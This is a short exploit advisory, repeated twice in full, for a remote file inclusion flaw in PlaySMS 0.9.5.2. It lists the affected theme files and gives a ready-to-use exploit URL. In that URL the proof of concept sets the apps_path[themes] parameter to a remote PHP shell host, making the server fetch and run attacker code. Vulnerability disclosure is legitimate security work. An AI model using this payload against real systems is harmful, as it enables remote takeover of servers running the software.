PlaySMS Remote File Inclusion Vulnerability
[o] PlaySMS <= Remote File Inclusion Vulnerability
Software : PlaySMS ver 0.9.5.2
Vendor : http://playsms.org/
Author : NoGe
[o] Vulnerability
affected all this files
web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php
[o] Exploit
http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]
[o] PoC
http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?
Software : PlaySMS ver 0.9.5.2
Vendor : http://playsms.org/
Author : NoGe
[o] Vulnerability
affected all this files
web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php
[o] Exploit
http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]
[o] PoC
http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?